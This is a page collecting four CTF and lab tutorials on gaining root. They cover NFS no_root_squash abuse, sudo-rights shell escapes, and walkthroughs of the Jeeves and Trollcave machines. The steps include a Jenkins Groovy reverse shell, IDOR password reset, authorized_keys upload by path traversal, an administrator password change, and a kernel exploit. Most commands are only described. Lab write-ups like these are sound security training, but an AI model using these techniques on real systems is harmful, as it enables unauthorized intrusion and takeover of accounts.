Linux Privilege Escalation using Misconfigured NFS

After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn how to exploit a misconfigured NFS share to gain root access to a remote host machine.

Table of contents

Introduction of NFS

Misconfigured NFS Lab setup

Scanning NFS shares

  • Nmap script
  • showmount

Exploiting NFS server for Privilege Escalation via:

Bash file

C program file

Nano/vi

  • Obtain shadow file
  • Obtain passwd file
  • Obtain sudoers file

Let’s Start!!

Network File System (NFS): Network File System permits a user on a client machine to mount the shared files or directories over a network. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers. Although NFS uses TCP/UDP port 2049 for sharing any files/directories over a network.

Misconfigured NFS Lab setup

Basically, there are three core configuration files (/etc/exports, /etc/hosts.allow, and /etc/hosts.deny) you will need to configure to set up an NFS server. BUT to configure weak NFS server we will look only /etc/export file.

To install NFS service execute below command in your terminal and open /etc/export file for configuration.

The /etc/exports file holds a record for each directory that you expect to share within a network machine. Each record describes how one directory or file is shared. 

Apply basic syntax for configuration:

 Directory         Host-IP(Option-list)

 There are various options will define which type of Privilege that machine will have over shared directory.

  • rw: Permit clients to read as well as write access to shared directory.
  • ro: Permit clients to Read-only access to shared directory..
  • root_squash: This option Prevents file request made by user root on the client machine because NFS shares change the root user to the nfsnobody user, which is an unprivileged user account.
  • no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implication.
  • async: It will speed up transfers but can cause data corruption as NFS server doesn’t wait for the complete write operation to be finished on the stable storage, before replying to the client.
  • sync:   The sync option does the inverse of async option where the NFS server will reply to the client only after the data is finally written to the stable storage.

Hopefully, it might be clear to you, how to configure the /etc/export file by using a particular option. An NFS system is considered weak or Misconfigured when following entry/record is edit into it for sharing any directory.

Above entry shows that we have shared /home directory and allowed the root user on the client to access files to read/ write operation and * sign denotes connection from any Host machine. After then restart the service with help of the following command.

Scanning NFS shares

Nmap

You can take help of Nmap script to scan NFS service in target network because it reveals the name of share directory of target’s system if port 2049 is opened.

 

Basically nmap exports showmount -e command to identify the shared directory and here we can clearly observe /home * is shared directory for everyone in the network.

Showmount

The same thing can be done manually by using showmount command but for that install nfs-common package on your local machine with help of the following command.

Exploiting NFS server for Privilege Escalation

Bash file

Now execute below command on your local machine to exploit NFS server for root privilege.

Above command will create a new folder raj inside /tmp and mount shared directory /home inside /tmp/raj. Then upload a local exploit to gain root by copying bin/bash and set suid permission.

 

Use df -h command to get summary of the amount of free disk space on each mounted disk.

First, you need to compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh. Now we knew that /home is shared directory, therefore, move inside it and follow below steps to get root access of victim’s machine.

So, it was the first method to pwn the root access with help of bin/bash if NFS system is configured weak. 

C Program

Similarly, we can use C language program file for root privilege escalation. We have generated a C-Program file and copied it into /tmp/raj folder. Since it is c program file therefore first we need to compile it and then set suid permission as done above.

Now repeat the above process and run shell file to obtained root access.

 So, it was the second method to pwn the root access with help of bin/bash via c-program if NFS system is misconfigured. 

Nano/Vi

Nano and vi editor both are most dangerous applications that can lead to privilege escalation if share directly or indirectly. In our case, it not shared directly but still, we can use any application for exploiting root access.

Follow below steps:

Since we have set suid permission to nano therefore after compromising target’s machine at least once we can escalate root privilege through various techniques.

When you will execute above command it will open shadow file, from where you can copy the hash password of any user.

Here I have copied hash password of the user: raj in a text file and saved as shadow then use john the ripper to crack that hash password.

Awesome!!! It tells raj having password 123. Now either you can login as raj and verify its privilege or follow next step.

Passwd file

Now we know the password of raj user but we are not sure that raj has root privilege or not, therefore, we can add raj into the root group by editing etc/passwd file.

Open the passwd file with help of nano and make following changes

Now use su command to switch user and enter the password found for raj.

Great!!! This was another way to get root access to target’s machine.

Sudoers file

We can also escalate root privilege by editing sudoers file where we can assign ALL privilege to our non-root user (ignite).

Open the sudoers file with help of nano and make following changes

Now use sudo bash command to access root terminal and get root privilege

Conclusion: Thus we saw the various approach to escalated root privilege if port 2049 is open for NFS services and server is weak configured. For your practice, you can play with ORCUS which is a vulnerable lab of vulnhub and read the article from here.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Linux Privilege Escalation using Sudo Rights

In our previous articles, we have discussed Linux Privilege Escalation using SUID Binaries and /etc/passwd file and today we are posting another method of “Linux privilege Escalation using Sudoers file”. While solving CTF challenges, for privilege escalation we always check root permissions for any user to execute any file or command by executing sudo -l command. You can read our previous article where we had applied this trick for privilege escalation.

Let’s Start with Theoretical Concept!!

In Linux/Unix, a sudoers file inside /etc is the configuration file for sudo rights. We all know the power of sudo command, the word sudo represent Super User Do root privilege task. Sudoers file is that file where the users and groups with root privileges are stored to run some or all commands as root or another user. Take a look at the following image.

When you run any command along with sudo, it needs root privileges for execution, Linux checks that particular username within the sudoers file. And it concluded, that the particular username is in the list of sudoers file or not, if not then you cannot run the command or program using sudo command. As per sudo rights the root user can execute from ALL terminals, acting as ALL users: ALL group, and run ALL command.

Sudoer File Syntax

 If you (root user) wish to grant sudo right to any particular user then type visudo command which will open the sudoers file for editing. Under “user privilege specification” you will observe default root permission “root ALL=(ALL:ALL) ALL” BUT in actual, there is Tag option also available which is optional, as explained below in the following image.

Consider the given example where we want to assign sudo rights for user:raaz to access the terminal and run copy command with root privilege. Here NOPASSWD tag that means no password will be requested for the user.

NOTE:

  1. (ALL:ALL) can also represent as (ALL)
  2. If you found (root) in place of (ALL:ALL) then it denotes that user can run the command as root.
  3. If nothing is mention for user/group then it means sudo defaults to the root user.

Let’s Begin!!

Let’s get into deep through practical work. First, create a user which should be not the sudo group user. Here we have added user “raaz” who’s UID is 1002 and GID is 1002 and hence raaz is non-root user.

 

Traditional Method to assign Root Privilege 

If system administrator wants to give ALL permission to user raaz then he can follow below steps to add user raaz under User Privilege Specification category.

Spawn Root Access

On other hands start yours attacking machine and first compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh and want to know sudo rights for the current user then execute below command.

In the traditional method, PASSWD option is enabled for user authentication while executing above command and it can be disabled by using NOPASSWD tag. The highlighted text is indicating that current user is authorized to execute all command. Therefore we have obtained root access by executing the command.

Default Method to assign Root Privilege 

If system administrator wants to give root permission to user raaz to execute all command and program then he can follow below steps to add user raaz under User Privilege Specification category.

Here also Default PASSWD option is enabled for user authentication.

Spawn Root Access

Again compromise the target system and then move for privilege escalation stage as done above and execute below command to view sudo user list.

sudo -l

Here you can perceive the highlighted text which is representative that the user raaz can run all command as root user. Therefore we can achieve root access by performing further down steps.

Note: Above both methods will ask user’s password for authentication at the time of execution of sudo -l command because by Default PASSWD option is enabled.

Allow Root Privilege to Binary commands

Sometimes the user has the authorization to execute any file or command of a particular directory such as /bin/cp, /bin/cat or /usr/bin/ find, this type of permission lead to privilege escalation for root access and it can be implemented with help of following steps.

 NOTE: Here NOPASSWD tag that means no password will be requested for the user while running sudo -l command.

 

Spawn Root Access using Find Command

Again compromised the Victim’s system and then move for privilege escalation phase and execute below command to view sudo user list.

sudo -l

At this point, you can notice the highlighted text is indicating that the user raaz can run any command through find command. Therefore we got root access by executing below commands.

 

Allow Root Privilege to Binary Programs

Sometimes admin assigns delicate authorities to a particular user to run binary programs which allow a user to edit any system files such as /etc/passwd and so on. There are certain binary programs which can lead to privilege escalation if authorized to a user. In given below command we have assign sudo rights to the following program which can be run as root user.

Spawn shell using Perl one-liner

At the time of privilege, escalation phase executes below command to view sudo user list.

Now you can observe the highlighted text is showing that the user raaz can run Perl language program or script as root user. Therefore we got root access by executing Perl one-liner.

id

 

Spawn shell using Python one-liner

After compromising the target system and then move for privilege escalation phase as done above and execute below command to view sudo user list.

sudo -l

At this point, you can perceive the highlighted text is indicating that the user raaz can run Python language program or script as root user. Thus we acquired root access by executing Python one-liner.

Spawn shell using Less Command

For the privilege, escalation phase executes below command to view sudo user list.

sudo -l

Here you can observe the highlighted text which is indicating that the user raaz can run less command as root user. Hence we obtained root access by executing following.

It will open requested system file for editing, BUT for spawning root shell type !bash as shown below and hit enter.

You will get root access as shown in the below image.

Spawn shell using AWK one-liner

After compromise, the target system then moves for privilege escalation phase as done above and execute below command to view sudo user list.

sudo -l

At this phase, you can notice the highlighted text is representing that the user raaz can run AWK language program or script as root user. Therefore we obtained root access by executing AWK one-liner.

Spawn shell using Man Command (Manual page)

For privilege escalation and execute below command to view sudo user list.

sudo -l

Here you can observe the highlighted text is indicating that the user raaz can run man command as root user. Therefore we got root access by executing following.

It will be displaying Linux manual pages for editing, BUT for spawning root shell type !bash as presented below and hit enter, you get root access as done above using Less command.

Spawn shell using Vi-editor (Visual editor)

After compromising the target system and then move for privilege escalation phase as done above and execute below command to view sudo user list.

sudo -l

Here you can observe the highlighted text which is indicating that user raaz can run vi command as root user. Consequently, we got root access by executing following.

sudo vi

Thus, It will open vi editors for editing, BUT for spawning root shell type !bash as shown below and hit enter, you get root access as done above using Less command.

You will get root access as shown in the below image.

NOTE: sudo permission for less, nano, man, vi and man is very dangerous as they allow user to edit system file and lead to Privilege Escalation. 

 

 Allow Root Privilege to Shell Script

There are maximum chances to get any kind of script for the system or program call, it can be any script either Bash, PHP, Python or C language script. Suppose you (system admin) want to give sudo permission to any script which will provide bash shell on execution.

For example, we have some scripts which will provide root terminal on execution, in given below image you can observe that we have written 3 programs for obtaining bash shell by using different programing language and saved all three files: asroot.py, asroot.sh, asroot.c (compiled file shell) inside bin/script.

NOTE: While solving OSCP challenges you will find that some script is hidden by the author for exploit kernel or for root shell and set sudo permission to any particular user to execute that script.

Now allow raaz to run all above script as root user by editing sudoers file with the help of following command.

 

Spawn root shell by Executing Bash script

For the privilege, escalation phase executes below command to view sudo user list.

sudo -l             

The highlighted text is indicating that the user raaz can run asroot.sh as root user. Therefore we got root access by running asroot.sh script.

 

Spawn root shell by Executing Python script

Execute below command for privilege escalation to view sudo user list.

sudo -l

At this time the highlighted text is showing that user raaz can run asroot.py as root user. Therefore we acquired root access by executing following script.

Spawn root shell by Executing C Language script

After compromising the target system and then move for privilege escalation and execute below command to view sudo user list.

sudo -l

Here you can perceive the highlighted text is indicating that the user raaz can run shell (asroot.c complied file) as root user. So we obtained root access by executing following shell.

Today we have demonstrated the various method to spawn root terminal of victim’s machine if any user is a member of sudoers file and has root permission.

HAPPY HACKING!!!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Box Challenge: Jeeves Walkthrough

Hello Friends!! Today we are going to solve another CTF Challenge “Jeeves”. This VM is also developed by Hack the Box, Jeeves is a Retired Lab and there are multiple ways to breach into this VM. In this lab, we have escalated root privilege in 3 different ways and for completing the challenge of this VM we took help from Tally (Hack the box).

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

As these labs are only available online, therefore, they have a static IP. Jeeves Lab has IP: 10.10.10.63.

Now, as always let’s begin our hacking with the port enumeration.

Looking around its result we found ports 22, 80, 135, 445 and 50000 are open, and moreover, port 135 and 445 was pointing towards Windows operating system.

Subsequently, first we checked web service and explored target IP in a web browser and it was put up by “Ask Jeeves search engine” webpage. So we try to search some website such as google.com and a new web page represented by the fake error page come up in front of us.

 On port 50000 in a Web browser give us to HTTP 404 Error page.

Then we decide to use OWASP Dirbuster for directory brute force attack.

From its result, we found so many directories but we drive with /askjeeves for further process.

So when we had explored 10.10.10.63:50000/askjeeves it lead us to “Jenkins Dashboard”. Ahhh!! It was WOW moment for us because we knew that there are so many methods to exploit Jenkins. Thus we move inside “Manage Jenkins” options as it was the spine and abusing it was quite soothing.

There were so many options but we were interested in Script Console because Jenkins has very nice Groovy script console that allows someone to execute arbitrary Groovy scripts within the Jenkins master runtime.

We found Java reverse shell from GitHub, so we copied the code and modified its localhost and port as per our specification.

Then we start Netcat listener and run above Groovy Script to access victim’s reverse connection. From below image, you can observe that we access tty shell of victim’s machine.

As we love meterpreter shell therefore we load metasploit framework and execute below commands.

Copy the highlighted text for powershell.exe and Paste it inside CMD shell as shown in next image.

Paste above malicious code here in netcat.

You will get meterpreter session of victim’s machine in your Metasploit framework and after then finished the task by grabbing user.txt and root.txt file. Further type following:

getuid

But currently we don’t have NT AUTHORITY\SYSTEM permission. But we knew the techniques that we have used in Tally CTF for gaining NT AUTHORITY\SYSTEM permission.

Therefore taking help from our previous article “Tally” we executed below commands and successfully gained NT AUTHORITY\SYSTEM permission

Let me tell you this, that we have solved so many CTF challenges of Hack the Box among them some was framed using Windows Operating system and we always grabbed the user.txt file from inside some a folder that owned by any username and root.txt form inside Administrator folder and both these folders are present inside C:\Users

Similarly, you can observe the same thing here also and might be you got my intention of above said words. So let’s grab user.txt file first from inside /kohsuke/Desktop.

COOL!!! We have captured the 1st flag.

Then we go for root.txt file, BUT it was a little bit tricky to get the root.txt file. Because the author has hide root.txt file by using some ADS technique (Windows Alternate Data Streams) and to grab that file, you can execute below commands.

Hurray!! R flag with dir command discloses root.txt file and  We successfully completed the 2nd task.

2nd Method

When you have fresh meterpreter session 1 then move into /document directory and download CEH.kdbx file. Here also we took help from our previous article TALLY.

Now run the python script that extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases.

Next, we have used John the ripper for decrypting the content of “passkey” with help of the following command.

so we found the master key “moonshine1” for keepass2 which is an application used for hiding passwords of your system then you need to install it (keepass2) using the following command.

After installing, run the below command and submit “moonshine1” in the field of the master key.

Inside CEH we found so many credential, we copied all password from here and past into a text file and got few password and one NTLM hash value: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Awesome!!! We have meterpreter session 2 with proper NT AUTHORITY\SYSTEM permission, now use above steps to get the root.txt file.

Note: we have rebooted the target’s VM before starting 2nd method.

At the time when you have fresh meterpreter session2 (via psexec) then execute the following command to enable remote desktop service in victim’s machine.

Now we have victim’s command prompt with administrator privilege thus we can change User administrator password directly by using net user command.

net user administrator 123

Now open a new terminal in your Kali Linux and type rdesktop 10.10.10.63 command to access remote desktop services of victim’s machine and after that submit credential administrator: 123 for login.

BOOOOOM!!! Look at the screen of our victim, now let’s grab the root flag and enjoy this GUI mode.

Finding user.txt is quite easy you can try by your own. To grab root.txt flag open the CMD prompt and type following command ad done above.

 Enjoy Hacking!!!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Trollcave VM (Boot to Root)

Hello friends! Today we are going to take another CTF challenge known as Trollcave. The credit for making this vm machine goes to “David Yates” and it is another boot to root challenge in which our goal is to gain root access and capture the flag to complete the challenge. You can download this VM from here.

Penetrating Methodology

  • Network Scanning (Nmap, netdiscover)
  • Information gathering:
  • Examining  Web Application  framework (Ruby on Rails)
  • Mutable User IDs from 1 to 17 to confirm King’s page for superadmin’s Account
  • Abusing Rails default directory for password reset (Google)
  • Exploiting IDOR  to reset Password for King’s Account
  • Login into superadmin console (King’s account)
  • Explore file manger tab  and enable uploading option
  • Generate SSH RSA key without password
  • Upload RSA key
  • Pwn tty shell by ssh login
  • Kernel privilege escalation (searchsploit)
  • Encode exploit with base 64
  • Transfer in victim’s machine and decode it.
  • Run the kernel exploit and Gain root access
  • Capture the flag and Finished the challenge

Let’s Breach!!!

Let’s start with getting to know the IP of VM (Here, I have it at 192.168.1.124 but you will have to find your own)

netdiscover

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

Awesome!! Nmap has dumped the details of services running on open port 22 and 80.

Knowing port 80 is open in victim’s network I preferred to explore his IP in a browser. At first glance, we saw three tabs Home, login and Register.

Then we scroll down the page and look at Ruby gem and found that this site is based on Ruby on rails. And on the right side we saw two categories i.e. 0nline users and Newest users, when we click on “xer” a new web page gets opened.

From its URL we perceived that user xer has user ID 17 and hence there must be any user between user ID 1 to 17.

So we manually replace id 17 from id 1 and found King’s page which was for superadmin account.

At its home page we read the post password reset by coderguy, represented by ruby gem for rail password reset and from Google we found default directory for password reset for reset. So we explored http://192.168.1.124/password_resets/new  and obtained password reset form.  Very first we try to reset superadmin password but unfortunately get failed, BUT successfully got the link for xer password reset.

Yeah!! It was Pretty Good to see a link for xer password reset, then we have copied that link.  

 

And past the copied link in URL, then swap name=xer from king as given below, later entered a new password for superadmin (king), it is known as IDOR.

Well!!! On executing URL; it gives a message “password reset successfully” and then we logged in superadmin account.

Yippee!!! Finally, we logged in as superadmin and access admin console, we saw many tabs and apparently click on file manager.

 

Here we saw enable file upload option, and we enabled it so that we can upload any backdoor whenever we need to upload that.

Thus we start from uploading PHP backdoor but failed to upload, similarly, we tried so many backdoors such as ruby, C shell and many more but get failed each time. After so many attempts we successfully upload ssh RSA file.

To do so follow the below steps:

 Here we have generated ssh RSA key file by the name of rails without a password and transferred rails.pub into authorized_keys and gave permission 600 for proper authentication.

Then upload the authorized_keys and add ../../../../../../home/rails/.ssh/authorized_keys path manually.

So after uploading SSH key, it was time to connect target’s machine through ssh key.

Awesome!! From below image, you can observe the target machine’s tty shell.

Then we execute lsb_release -a command to know the version of the kernel and found 16.04. After then with the help of searchsploit found kernel exploit 44298.c for local privilege escalation.

At that moment we copied this exploit on Desktop and compiled it, now it was impossible to transfer the exploit using simple complied file, therefore, we need to encode it file into base64. You use below command to follow same steps.

We copied the base64 encoded value then movie into target’s terminal where we created an empty file exploit.base64 with the help of nano and past above copied encode code.

Far ahead decoded it in a new file as rootshell and give all permission to the decoded file. At last, we run the rootshell file to get root privilege.

BINGO!!!! We got the root flag!!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...